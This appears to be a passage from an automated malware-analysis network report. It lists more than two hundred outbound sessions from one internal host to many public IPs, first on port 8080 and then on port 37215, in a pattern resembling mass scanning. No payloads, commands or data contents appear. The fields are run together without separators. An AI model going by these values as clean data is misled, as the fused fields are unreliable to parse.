                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3336192.168.2.235167860.175.239.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3337192.168.2.2346410202.206.67.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3338192.168.2.2350684150.166.99.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3339192.168.2.2356740136.127.64.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3340192.168.2.236085232.24.47.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3341192.168.2.2334674137.2.218.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3342192.168.2.2347626179.208.243.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3343192.168.2.2359300223.196.229.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3344192.168.2.2343032188.231.132.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3345192.168.2.2358996206.35.125.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3346192.168.2.2339056104.91.61.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3347192.168.2.23600142.96.51.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3348192.168.2.234257417.65.223.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3349192.168.2.2359954125.134.147.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3350192.168.2.233688239.190.87.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3351192.168.2.234614419.186.128.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3352192.168.2.235829882.53.191.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3353192.168.2.2340662124.33.255.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3354192.168.2.235537644.50.230.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3355192.168.2.2348832115.153.214.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3356192.168.2.2347728119.19.245.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3357192.168.2.2355604150.40.49.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3358192.168.2.235229088.246.215.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3359192.168.2.235134842.101.224.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3360192.168.2.2344838211.130.178.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3361192.168.2.2350526201.93.168.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3362192.168.2.234391295.169.99.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3363192.168.2.234026483.177.143.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3364192.168.2.2339282170.181.37.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3365192.168.2.2352962194.105.2.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3366192.168.2.235666273.160.82.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3367192.168.2.2339744148.190.225.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3368192.168.2.23377288.10.50.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3369192.168.2.235511052.253.163.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3370192.168.2.2342254140.9.48.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3371192.168.2.235794062.186.95.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3372192.168.2.234567425.206.71.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3373192.168.2.234944279.185.85.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3374192.168.2.235882632.251.216.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3375192.168.2.2334988175.99.7.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3376192.168.2.234077643.88.54.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3377192.168.2.2333626182.132.0.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3378192.168.2.2357952121.78.201.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3379192.168.2.2341416208.10.20.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3380192.168.2.2350908199.39.38.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3381192.168.2.235849838.247.184.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3382192.168.2.234755284.170.9.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3383192.168.2.2333978183.125.135.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3384192.168.2.236023076.29.127.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3385192.168.2.2335842157.242.160.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3386192.168.2.2348762218.107.136.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3387192.168.2.2353218126.234.151.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3388192.168.2.235902027.65.99.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3389192.168.2.233951451.188.201.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3390192.168.2.235670262.195.153.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3391192.168.2.2350442181.7.82.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3392192.168.2.2348462148.149.181.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3393192.168.2.2346816111.138.57.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3394192.168.2.236071613.159.69.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3395192.168.2.234136031.185.39.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3396192.168.2.235649496.79.1.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3397192.168.2.2352192144.214.44.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3398192.168.2.235364471.60.16.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3399192.168.2.2339604203.103.132.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3400192.168.2.2353010200.102.179.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3401192.168.2.233937492.213.224.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3402192.168.2.235171614.71.128.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3403192.168.2.2359174216.42.189.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3404192.168.2.2351438204.107.25.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3405192.168.2.233505470.100.30.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3406192.168.2.235045866.148.133.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3407192.168.2.234373852.52.180.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3408192.168.2.235864888.243.98.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3409192.168.2.2346168112.104.224.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3410192.168.2.2339548162.210.134.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3411192.168.2.233682680.78.117.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3412192.168.2.2354936176.187.61.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3413192.168.2.233378472.37.9.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3414192.168.2.23431342.36.46.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3415192.168.2.234970499.155.199.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3416192.168.2.2344506177.168.71.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3417192.168.2.2334802190.150.57.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3418192.168.2.2360194166.8.98.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3419192.168.2.235089088.166.42.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3420192.168.2.235567270.202.186.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3421192.168.2.2341742205.235.178.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3422192.168.2.235737443.7.201.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3423192.168.2.2337802197.136.91.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3424192.168.2.2350174197.230.140.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3425192.168.2.235670641.22.193.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3426192.168.2.233326241.190.19.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3427192.168.2.2334324157.151.110.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3428192.168.2.2349296157.141.86.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3429192.168.2.2353206197.175.53.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3430192.168.2.2333900206.3.216.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3431192.168.2.2344020171.254.100.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3432192.168.2.2334874113.223.74.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3433192.168.2.2353450157.215.216.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3434192.168.2.236073241.23.193.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3435192.168.2.2347024157.165.144.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3436192.168.2.2339500157.232.36.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3437192.168.2.2342602197.187.156.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3438192.168.2.2341412197.42.14.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3439192.168.2.2343906157.236.232.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3440192.168.2.2357634157.163.7.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3441192.168.2.2342820187.199.127.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3442192.168.2.2360492157.139.75.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3443192.168.2.2335580157.235.180.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3444192.168.2.2338672202.32.210.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3445192.168.2.2335106110.252.86.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3446192.168.2.234396292.72.246.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3447192.168.2.2335032157.154.106.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3448192.168.2.2336494176.240.168.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3449192.168.2.235763041.179.163.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3450192.168.2.2335118197.170.113.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3451192.168.2.2335402168.227.155.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3452192.168.2.2347286197.230.196.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3453192.168.2.2359990113.18.25.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3454192.168.2.234299441.25.22.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3455192.168.2.235847841.154.166.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3456192.168.2.233703841.135.99.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3457192.168.2.2341908157.246.107.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3458192.168.2.2335136157.204.198.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3459192.168.2.2337448157.53.156.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3460192.168.2.2340784181.46.137.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3461192.168.2.2339294157.142.232.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3462192.168.2.234505641.159.111.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3463192.168.2.2335354197.200.217.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3464192.168.2.234193841.50.167.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3465192.168.2.233968441.25.75.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3466192.168.2.235567241.242.249.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3467192.168.2.235198041.179.137.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3468192.168.2.2335892111.144.231.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3469192.168.2.233907072.115.51.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3470192.168.2.235966441.188.162.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3471192.168.2.2334634157.132.7.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3472192.168.2.2346998197.143.179.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3473192.168.2.235678441.194.163.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3474192.168.2.2335378197.210.156.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3475192.168.2.2347368197.205.66.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3476192.168.2.233377483.110.95.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3477192.168.2.2356374197.73.96.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3478192.168.2.2343090197.43.248.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3479192.168.2.2350282157.192.68.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3480192.168.2.235556441.168.74.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3481192.168.2.233543441.215.183.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3482192.168.2.234032841.50.235.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3483192.168.2.2340508197.111.139.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3484192.168.2.2356654201.51.31.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3485192.168.2.2352700157.38.193.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3486192.168.2.2348042197.250.53.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3487192.168.2.2337256197.190.176.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3488192.168.2.2359458197.140.209.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3489192.168.2.2356280147.230.87.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3490192.168.2.2353866199.37.240.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3491192.168.2.2355432197.159.170.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3492192.168.2.233846040.6.138.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3493192.168.2.233987247.3.104.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3494192.168.2.234530447.246.196.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3495192.168.2.2354872197.161.123.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3496192.168.2.234760434.40.233.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3497192.168.2.235676635.247.212.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3498192.168.2.2349318197.193.102.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3499192.168.2.2356796103.43.128.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3500192.168.2.2343890197.105.103.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3501192.168.2.2348424217.145.228.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3502192.168.2.2343208157.100.50.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3503192.168.2.2343124157.205.100.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3504192.168.2.235121881.79.216.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3505192.168.2.2352072157.74.92.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3506192.168.2.235322841.128.176.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3507192.168.2.2351164197.11.74.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3508192.168.2.2344628101.156.125.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3509192.168.2.2347738197.1.159.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3510192.168.2.2360362157.66.36.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3511192.168.2.2358214165.237.201.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3512192.168.2.2357024120.144.7.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3513192.168.2.234854841.151.54.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3514192.168.2.2346688157.70.196.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3515192.168.2.2335286157.130.173.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3516192.168.2.234975441.25.166.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3517192.168.2.2336126197.151.9.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3518192.168.2.235245841.61.205.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3519192.168.2.2359824197.70.49.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3520192.168.2.234865241.170.68.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3521192.168.2.2345902157.171.212.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3522192.168.2.2343542157.61.28.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3523192.168.2.2350426221.89.168.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3524192.168.2.2350050158.117.7.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3525192.168.2.2353204157.191.105.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3526192.168.2.2355172197.229.127.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3527192.168.2.2334884157.105.241.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3528192.168.2.2355842197.39.136.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3529192.168.2.2355820157.15.110.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3530192.168.2.234919641.133.163.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3531192.168.2.2359312117.38.2.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3532192.168.2.2348704197.11.84.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3533192.168.2.235265841.112.222.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3534192.168.2.2334570197.12.196.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3535192.168.2.2352000157.50.42.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3536192.168.2.2345262157.38.171.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3537192.168.2.2345402108.169.75.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3538192.168.2.234276041.177.184.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3539192.168.2.235467241.134.67.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3540192.168.2.234912241.19.181.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3541192.168.2.2344462157.226.34.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3542192.168.2.233295834.136.183.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3543192.168.2.233688241.120.157.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3544192.168.2.2344052197.71.93.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3545192.168.2.2335636197.21.255.17337215
                                                        TimestampBytes transferredDirectionData


